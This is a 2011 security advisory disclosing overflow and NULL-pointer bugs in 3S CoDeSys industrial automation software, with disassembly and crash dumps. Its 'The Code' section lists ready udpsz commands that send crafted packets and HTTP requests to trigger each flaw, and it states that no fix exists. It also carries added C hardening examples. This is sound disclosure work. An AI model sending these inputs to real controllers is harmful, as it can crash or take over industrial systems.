Message-Id: <20111129181242.d97cee5c.aluigi@autistici.org>
Date: Tue, 29 Nov 2011 18:12:42 +0000
From: Luigi Auriemma <aluigi@...istici.org>
To: bugtraq@...urityfocus.com
Subject: Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2

#######################################################################

                             Luigi Auriemma

Application:  3S CoDeSys
              http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions:     <= 3.4 SP4 Patch 2
Platforms:    Windows
Bugs:         A] GatewayService integer overflow
              B] CmpWebServer stack overflow
              C] CmpWebServer Content-Length NULL pointer
              D] CmpWebServer invalid HTTP request NULL pointer
              E] CmpWebServer folders creation
Exploitation: remote
Date:         29 Nov 2011
Author:       Luigi Auriemma
              e-mail: aluigi@...istici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's homepage:
"The CoDeSys Automation Suite is a comprehensive software tool for
industrial automation technology. All common automation tasks solved by
means of software can be realized with the CoDeSys Suite based on the
wide-spread controller and PLC development system of the same name."


#######################################################################

=======
2) Bugs
=======


----------------------------------
A] GatewayService integer overflow
----------------------------------

GatewayService uses a 32-bit value at offset 0x0c of the header which
specifies the size of the data to receive.
The program takes this number, adds 0x34 and allocates that amount of
memory, so a value close to 0xffffffff wraps around and results in an
integer overflow (a tiny buffer for a huge announced size):

  0042CB30  /$ 55             PUSH EBP
  0042CB31  |. 8BEC           MOV EBP,ESP
  0042CB33  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]
  0042CB36  |. 83C0 34        ADD EAX,34
  0042CB39  |. 5D             POP EBP
  0042CB3A  \. C3             RETN
  ...
  00447AF7  |. 8B45 0C        MOV EAX,DWORD PTR SS:[EBP+C]
  00447AFA  |. 50             PUSH EAX
  00447AFB  |. E8 3050FEFF    CALL GatewayS.0042CB30        ; + 0x34
  00447B00  |. 83C4 04        ADD ESP,4
  00447B03  |. 8945 0C        MOV DWORD PTR SS:[EBP+C],EAX
  00447B06  |> 6A 01          PUSH 1
  00447B08  |. 8B4D 0C        MOV ECX,DWORD PTR SS:[EBP+C]
  00447B0B  |. 51             PUSH ECX
  00447B0C  |. E8 A7050200    CALL GatewayS.004680B8        ; allocation
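The arithmetic behind bug A, as an added illustration (not code from the advisory or from 3S): the unchecked 32-bit `size + 0x34` the disassembly shows, beside a checked version that refuses a size that would wrap or exceed a limit. The 16-byte header layout, the 16 MiB policy cap and the sample headers are assumptions; only the 0x0c offset, the 0x34 slack and the 0xfffffff2 test value come from the advisory.

```c
#include <stdint.h>
#include <stddef.h>

#define HDR_EXTRA   0x34u   /* slack the gateway adds to the received size before allocating */
#define LEN_OFFSET  0x0c    /* offset of the 32-bit size field in the header */
#define HDR_SIZE    0x10    /* assumed header length for the samples below; not from the advisory */
#define MAX_PAYLOAD (16u << 20)  /* assumed 16 MiB upper bound: a policy choice, not from the advisory */

/* Constructed 16-byte headers: only the little-endian size field at offset 0x0c matters here.
 * SAMPLE_WRAP carries 0xfffffff2, the value used by the advisory's test command. */
static const uint8_t SAMPLE_WRAP[HDR_SIZE] = {
    'a','a','a','a', 'a','a','a','a', 'a','a','a','a', 0xf2, 0xff, 0xff, 0xff };
static const uint8_t SAMPLE_OK[HDR_SIZE] = {
    'a','a','a','a', 'a','a','a','a', 'a','a','a','a', 0x00, 0x04, 0x00, 0x00 };   /* 1024 */

/* Reads the little-endian 32-bit size field without relying on host byte order. */
uint32_t read_size_field(const uint8_t *hdr) {
    return (uint32_t)hdr[LEN_OFFSET] | ((uint32_t)hdr[LEN_OFFSET + 1] << 8) |
           ((uint32_t)hdr[LEN_OFFSET + 2] << 16) | ((uint32_t)hdr[LEN_OFFSET + 3] << 24);
}

/* The arithmetic the disassembly shows: ADD EAX,34 in 32 bits with no overflow check.
 * 0xfffffff2 + 0x34 wraps to 0x26, so a tiny buffer is allocated for a huge length. */
uint32_t alloc_size_vulnerable(uint32_t size) {
    return size + HDR_EXTRA;
}

/* Hardened version: returns the allocation size, or 0 when the request must be refused
 * (0 is never a valid result because HDR_EXTRA is always added). The sum is computed in
 * 64 bits and both checks run before the value reaches the allocator. */
uint64_t alloc_size_checked(uint32_t size) {
    uint64_t total = (uint64_t)size + HDR_EXTRA;
    if (total > UINT32_MAX) return 0;      /* would wrap in the original 32-bit register */
    if (size > MAX_PAYLOAD) return 0;      /* policy limit on what a peer may ask for */
    return total;
}
```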


------------------------------
B] CmpWebServer stack overflow
------------------------------

CmpWebServer is the component used in services like 3SRTESrv3 and
CoDeSysControlService for handling the HTTP connections on port 8080.

The library is affected by a buffer overflow in the function 0040f480,
which copies the input URI into a fixed-size stack buffer, allowing code
execution:

  0040F5C5  |> 8B55 F4        MOV EDX,DWORD PTR SS:[EBP-C]
  0040F5C8  |. 2B55 08        SUB EDX,DWORD PTR SS:[EBP+8]
  0040F5CB  |. 52             PUSH EDX
  0040F5CC  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]
  0040F5CF  |. 50             PUSH EAX
  0040F5D0  |. 8B4D 10        MOV ECX,DWORD PTR SS:[EBP+10]
  0040F5D3  |. 51             PUSH ECX
  0040F5D4  |. E8 97420000    CALL CoDeSysC.00413870    ; memcpy


-------------------------------------------
C] CmpWebServer Content-Length NULL pointer
-------------------------------------------

NULL pointer dereference caused by the lack of checks on the memory
allocated while trusting the Content-Length value of an HTTP POST
request:

  eax=812aa3a7 ebx=00a7ae7c ecx=20000000 edx=00000000 esi=012aa3a7 edi=00000000
  eip=0128cc9a esp=02e9feec ebp=02e9fef4 iopl=0         nv up ei pl nz ac po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
  CmpWebServer!ComponentEntry+0xb37a:
  0128cc9a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]


-------------------------------------------------
D] CmpWebServer invalid HTTP request NULL pointer
-------------------------------------------------

NULL pointer dereference caused by an unexpected HTTP request method
other than GET, POST or HEAD:

  eax=028228d4 ebx=00000009 ecx=00000004 edx=02822957 esi=00000000 edi=00000005
  eip=0128dd6c esp=02e9fed4 ebp=02e9fee0 iopl=0         nv up ei pl nz na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
  CmpWebServer!ComponentEntry+0xc44c:
  0128dd6c 3a51fc          cmp     dl,byte ptr [ecx-4]        ds:0023:00000000=??
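Request validation covering bugs C and D, as an added example (not code from the advisory or from CmpWebServer): the method is checked against the three the server handles before any other processing, and the Content-Length is parsed and bounded before it is used to size a buffer. The 1 MiB body cap, the function names and the sample requests are assumptions; the request shapes mirror the advisory's test commands.

```c
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>

#define MAX_BODY (1ull << 20)   /* assumed 1 MiB body cap: a policy choice, not taken from the advisory */

enum req_status { REQ_OK = 0, REQ_BAD_METHOD, REQ_BAD_LENGTH };

/* Constructed requests with the same shapes as the advisory's test commands. */
static const char *REQ_GET        = "GET / HTTP/1.0\r\n\r\n";
static const char *REQ_POST_HUGE  = "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n";
static const char *REQ_POST_SMALL = "POST / HTTP/1.0\r\nContent-Length: 12\r\n\r\nhello world!";
static const char *REQ_UNKNOWN    = "BLAH / HTTP/1.0\r\n\r\n";

/* Only the methods the server actually handles; anything else is refused up front
 * instead of reaching a code path whose state was never set up (bug D). */
int method_supported(const char *req) {
    return strncmp(req, "GET ", 4) == 0 || strncmp(req, "POST ", 5) == 0 ||
           strncmp(req, "HEAD ", 5) == 0;
}

/* Returns the Content-Length value, or -1 if the header is absent, non-numeric,
 * negative or too large to represent. The raw value is returned so the caller
 * can apply its own limit. */
long long content_length(const char *req) {
    const char *p = strstr(req, "\r\nContent-Length:");
    char *end;
    unsigned long long v;
    if (p == NULL) return -1;
    p += strlen("\r\nContent-Length:");
    while (*p == ' ' || *p == '\t') p++;
    if (!isdigit((unsigned char)*p)) return -1;   /* rejects "-1" and empty values */
    errno = 0;
    v = strtoull(p, &end, 10);
    if (errno == ERANGE || v > (unsigned long long)LLONG_MAX) return -1;
    if (*end != '\r' && *end != '\n' && *end != '\0') return -1;
    return (long long)v;
}

/* Validation that must run before any buffer is sized from the request. The crash in
 * bug C is a copy into a buffer whose allocation failed (edi=0), so the announced length
 * is bounded here; the caller must still check the allocator's return value. */
enum req_status check_request(const char *req) {
    if (!method_supported(req)) return REQ_BAD_METHOD;
    if (strncmp(req, "POST ", 5) != 0) return REQ_OK;          /* GET/HEAD carry no body */
    long long len = content_length(req);
    if (len < 0 || (unsigned long long)len > MAX_BODY) return REQ_BAD_LENGTH;
    return REQ_OK;
}
```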


--------------------------------
E] CmpWebServer folders creation
--------------------------------

Not a security bug (at least at the moment) but weird and funny enough
to note.
The webserver calls CreateDirectory at address 0041206d before doing a
secondary CreateFile (read mode).
The only possible attack scenario I can imagine is if the server
automatically generates logs or other files and this bug prevents their
creation due to the presence of folders with the same names, but I don't
know the software well enough to confirm this scenario.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

A]
  udpsz -T -b 0x61 -X 0xc 32 l 0xfffffff2 -1 -l 0 -D SERVER 1217 0xffff

B]
  udpsz -c "GET /" 0 -b a -c "\\a HTTP/1.0\r\n\r\n" -1 -T -D SERVER 8080 8192

C]
  udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

D]
  udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

E]
  udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
  ...


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org
